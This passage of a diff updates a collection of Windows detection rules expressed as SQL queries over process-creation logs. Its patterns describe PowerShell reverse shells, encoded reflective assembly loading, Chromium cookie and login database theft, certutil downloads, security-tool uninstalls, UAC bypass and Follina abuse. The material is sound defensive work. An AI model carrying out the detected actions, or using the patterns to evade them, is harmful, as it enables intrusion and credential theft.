LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE 